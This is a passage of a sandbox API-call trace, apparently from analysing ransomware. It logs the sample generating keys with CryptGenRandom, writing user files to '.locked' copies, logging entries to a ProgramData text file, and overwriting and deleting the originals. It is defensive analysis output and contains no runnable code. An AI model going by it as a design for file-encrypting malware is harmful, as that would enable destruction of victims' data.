(hObject=0x240) returned 1 [0321.551] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.552] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.572] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.573] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) Thread: id = 438 os_tid = 0xe5c [0260.548] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x336aff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x336aff58*=0x1a8) returned 1 [0260.548] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12657a24*=0xa) returned 1 [0260.601] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\IcNKdj QY jIfR5.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\icnkdj qy jifr5.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0260.601] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0260.657] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\IcNKdj QY jIfR5.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\icnkdj qy jifr5.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0261.057] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x20c [0261.057] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0261.569] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0261.569] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0261.569] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8010 | out: pbBuffer=0x124a8010) returned 1 [0261.569] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0261.570] WriteFile (in: hFile=0x208, lpBuffer=0x12701000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x12701000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0261.571] VirtualAlloc (lpAddress=0x16320000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x16320000 [0261.662] VirtualAlloc (lpAddress=0x10c70000, dwSize=0x9e000, flAllocationType=0x1000, flProtect=0x4) returned 0x10c70000 [0261.664] VirtualAlloc (lpAddress=0x216d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x216d000 [0261.812] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0261.812] SetEvent (hEvent=0x21c) returned 1 [0261.812] SetEvent (hEvent=0x1dc) returned 1 [0261.812] SetEvent (hEvent=0x1ac) returned 1 [0261.812] ReadFile (in: hFile=0x1b0, lpBuffer=0x15cee000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x15cee000*, lpNumberOfBytesRead=0x12657d68*=0x115a0, lpOverlapped=0x0) returned 1 [0261.815] WriteFile (in: hFile=0x208, lpBuffer=0x15cee000*, nNumberOfBytesToWrite=0x115a0, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x15cee000*, lpNumberOfBytesWritten=0x12657d74*=0x115a0, lpOverlapped=0x0) returned 1 [0261.903] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0262.784] ReadFile (in: hFile=0x1b0, lpBuffer=0x15cee000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x15cee000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0262.784] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0263.067] CloseHandle (hObject=0x208) returned 1 [0263.114] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0265.866] CloseHandle (hObject=0x1b0) returned 1 [0265.866] SetEvent (hEvent=0x220) returned 1 [0265.866] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0269.689] SetEvent (hEvent=0x1ac) returned 1 [0269.689] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0269.701] SetEvent (hEvent=0x214) returned 1 [0269.701] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0269.858] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PNlMo1Rui9-Os7LqiJYf.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pnlmo1rui9-os7lqijyf.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0270.261] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0270.413] SetEvent (hEvent=0x1ac) returned 1 [0270.413] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x123a1e88 | out: lpMode=0x123a1e88) returned 0 [0270.413] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0272.934] SetEvent (hEvent=0x214) returned 1 [0272.934] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0272.937] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0273.164] SetEvent (hEvent=0x14c) returned 1 [0273.164] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0273.183] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\kY10RHpj1Ccj R.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ky10rhpj1ccj r.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0273.184] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x124a0d9c | out: lpMode=0x124a0d9c) returned 0 [0273.184] SetEvent (hEvent=0x22c) returned 1 [0273.184] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0273.253] SetEvent (hEvent=0x14c) returned 1 [0273.253] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0273.269] SetEvent (hEvent=0x1ac) returned 1 [0273.269] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0273.443] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12635a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12635a24*=0xb) returned 1 [0273.453] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\ZA606Y.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\za606y.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0273.453] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12635d9c | out: lpMode=0x12635d9c) returned 0 [0273.453] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\ZA606Y.rtf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\za606y.rtf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0273.713] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0274.039] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12635d9c | out: lpMode=0x12635d9c) returned 0 [0274.039] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0274.039] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0274.039] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0274.040] WriteFile (in: hFile=0x180, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12635d78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x12635d78*=0x80, lpOverlapped=0x0) returned 1 [0274.074] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0274.112] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0274.112] SetEvent (hEvent=0x150) returned 1 [0274.112] SetEvent (hEvent=0x1dc) returned 1 [0274.112] SetEvent (hEvent=0x22c) returned 1 [0274.112] SetEvent (hEvent=0x1ac) returned 1 [0274.112] ReadFile (in: hFile=0x188, lpBuffer=0x12c1a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12635d68, lpOverlapped=0x0 | out: lpBuffer=0x12c1a000*, lpNumberOfBytesRead=0x12635d68*=0xe90f, lpOverlapped=0x0) returned 1 [0274.114] WriteFile (in: hFile=0x180, lpBuffer=0x12c1a000*, nNumberOfBytesToWrite=0xe90f, lpNumberOfBytesWritten=0x12635d74, lpOverlapped=0x0 | out: lpBuffer=0x12c1a000*, lpNumberOfBytesWritten=0x12635d74*=0xe90f, lpOverlapped=0x0) returned 1 [0274.169] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0274.734] ReadFile (in: hFile=0x188, lpBuffer=0x12c1a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12635d68, lpOverlapped=0x0 | out: lpBuffer=0x12c1a000*, lpNumberOfBytesRead=0x12635d68*=0x0, lpOverlapped=0x0) returned 1 [0274.734] CloseHandle (hObject=0x180) returned 1 [0274.737] CloseHandle (hObject=0x188) returned 1 [0274.738] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0274.738] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12635e94 | out: lpMode=0x12635e94) returned 0 [0274.738] WriteFile (in: hFile=0x188, lpBuffer=0x1234a2c0*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x12635e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a2c0*, lpNumberOfBytesWritten=0x12635e64*=0x37, lpOverlapped=0x0) returned 1 [0274.738] CloseHandle (hObject=0x188) returned 1 [0274.739] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\ZA606Y.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\za606y.rtf")) returned 1 [0276.026] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0276.881] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0277.174] SetEvent (hEvent=0x14c) returned 1 [0277.174] SetEvent (hEvent=0x104) returned 1 [0277.174] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0277.855] SetEvent (hEvent=0x184) returned 1 [0277.855] SetEvent (hEvent=0x1ac) returned 1 [0277.855] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0277.923] SetEvent (hEvent=0x184) returned 1 [0277.923] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0277.929] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0277.973] SetEvent (hEvent=0x104) returned 1 [0277.973] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0278.017] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0278.017] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0278.051] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0278.051] SetEvent (hEvent=0x21c) returned 1 [0278.051] SetEvent (hEvent=0x12c) returned 1 [0278.051] SetEvent (hEvent=0x104) returned 1 [0278.051] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0278.118] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0278.118] SetEvent (hEvent=0x150) returned 1 [0278.118] SetEvent (hEvent=0x12c) returned 1 [0278.118] SetEvent (hEvent=0x104) returned 1 [0278.118] SetEvent (hEvent=0x21c) returned 1 [0278.119] SetEvent (hEvent=0x1d0) returned 1 [0278.119] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0278.779] SetEvent (hEvent=0x1d0) returned 1 [0278.779] SetEvent (hEvent=0x1ac) returned 1 [0278.779] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0278.949] SetEvent (hEvent=0x1d0) returned 1 [0278.949] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0279.018] SetEvent (hEvent=0x1b8) returned 1 [0279.018] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0279.140] SetEvent (hEvent=0x21c) returned 1 [0279.140] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0279.195] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0279.195] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0279.231] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0279.232] SetEvent (hEvent=0x1dc) returned 1 [0279.232] SetEvent (hEvent=0x21c) returned 1 [0279.232] SetEvent (hEvent=0x184) returned 1 [0279.232] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0279.316] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0279.317] SetEvent (hEvent=0x150) returned 1 [0279.317] SetEvent (hEvent=0x21c) returned 1 [0279.317] SetEvent (hEvent=0x184) returned 1 [0279.317] SetEvent (hEvent=0x1dc) returned 1 [0279.369] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\0C0imTxCn.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\0c0imtxcn.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0279.730] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x124a2e88 | out: lpMode=0x124a2e88) returned 0 [0279.730] WriteFile (in: hFile=0x188, lpBuffer=0x12a7e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a2e78, lpOverlapped=0x0 | out: lpBuffer=0x12a7e000*, lpNumberOfBytesWritten=0x124a2e78*=0xfa000, lpOverlapped=0x0) returned 1 [0279.770] CloseHandle (hObject=0x188) returned 1 [0280.199] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0282.471] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\0C0imTxCn.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\0c0imtxcn.mp3")) returned 1 [0282.635] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0282.635] SetEvent (hEvent=0x21c) returned 1 [0282.635] SetEvent (hEvent=0x134) returned 1 [0282.635] SetEvent (hEvent=0x198) returned 1 [0282.636] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0282.656] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0282.656] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0282.694] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0282.694] SetEvent (hEvent=0x1b8) returned 1 [0282.694] SetEvent (hEvent=0x184) returned 1 [0282.694] SetEvent (hEvent=0x198) returned 1 [0282.694] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0282.711] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0282.711] SetEvent (hEvent=0x184) returned 1 [0282.712] SetEvent (hEvent=0x198) returned 1 [0282.712] SetEvent (hEvent=0x1b8) returned 1 [0282.780] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\2I YP.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\2i yp.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0283.560] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0283.797] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0283.797] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0284.561] WriteFile (in: hFile=0x1bc, lpBuffer=0x1792c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12659e78, lpOverlapped=0x0 | out: lpBuffer=0x1792c000*, lpNumberOfBytesWritten=0x12659e78*=0xfa000, lpOverlapped=0x0) returned 1 [0284.643] CloseHandle (hObject=0x1bc) returned 1 [0284.906] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0285.612] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\2I YP.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\2i yp.mkv")) returned 1 [0286.071] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0286.079] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0286.079] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0286.379] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0286.379] SetEvent (hEvent=0x214) returned 1 [0286.379] SetEvent (hEvent=0x22c) returned 1 [0286.379] SetEvent (hEvent=0x190) returned 1 [0286.379] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0286.497] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0286.497] SetEvent (hEvent=0x150) returned 1 [0286.497] SetEvent (hEvent=0x190) returned 1 [0286.497] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12659a24*=0xb) returned 1 [0286.520] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4R8gdYA15.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4r8gdya15.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0286.520] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0286.520] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4R8gdYA15.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4r8gdya15.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0286.527] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0286.527] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0286.527] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8030 | out: pbBuffer=0x124a8030) returned 1 [0286.527] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0286.528] WriteFile (in: hFile=0x1b0, lpBuffer=0x126eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x126eb000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0286.535] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0286.570] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0286.570] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0286.570] SetEvent (hEvent=0x150) returned 1 [0286.570] SetEvent (hEvent=0x184) returned 1 [0286.570] SetEvent (hEvent=0x190) returned 1 [0286.570] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12659d68*=0xc74a, lpOverlapped=0x0) returned 1 [0286.573] WriteFile (in: hFile=0x1b0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xc74a, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x12659d74*=0xc74a, lpOverlapped=0x0) returned 1 [0286.591] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0286.856] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0286.857] CloseHandle (hObject=0x1b0) returned 1 [0286.861] CloseHandle (hObject=0x19c) returned 1 [0286.861] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0286.861] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12659e94 | out: lpMode=0x12659e94) returned 0 [0286.861] WriteFile (in: hFile=0x19c, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12659e64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x12659e64*=0x34, lpOverlapped=0x0) returned 1 [0286.861] CloseHandle (hObject=0x19c) returned 1 [0286.864] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4R8gdYA15.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4r8gdya15.docx")) returned 1 [0286.904] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0286.984] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0286.984] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0286.984] SetEvent (hEvent=0x150) returned 1 [0286.984] SetEvent (hEvent=0x214) returned 1 [0286.984] SetEvent (hEvent=0x21c) returned 1 [0286.984] SetEvent (hEvent=0x184) returned 1 [0286.994] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0287.004] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0287.004] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0287.085] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0287.086] SetEvent (hEvent=0x22c) returned 1 [0287.086] SetEvent (hEvent=0x184) returned 1 [0287.086] SetEvent (hEvent=0x21c) returned 1 [0287.086] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0287.141] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0287.141] SetEvent (hEvent=0x150) returned 1 [0287.141] SetEvent (hEvent=0x184) returned 1 [0287.141] SetEvent (hEvent=0x21c) returned 1 [0287.141] SetEvent (hEvent=0x22c) returned 1 [0287.152] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4R8gdYA15.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4r8gdya15.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0287.191] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0287.191] WriteFile (in: hFile=0x1b0, lpBuffer=0x13d54000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12659e78, lpOverlapped=0x0 | out: lpBuffer=0x13d54000*, lpNumberOfBytesWritten=0x12659e78*=0xfa000, lpOverlapped=0x0) returned 1 [0287.375] WaitForSingleObject 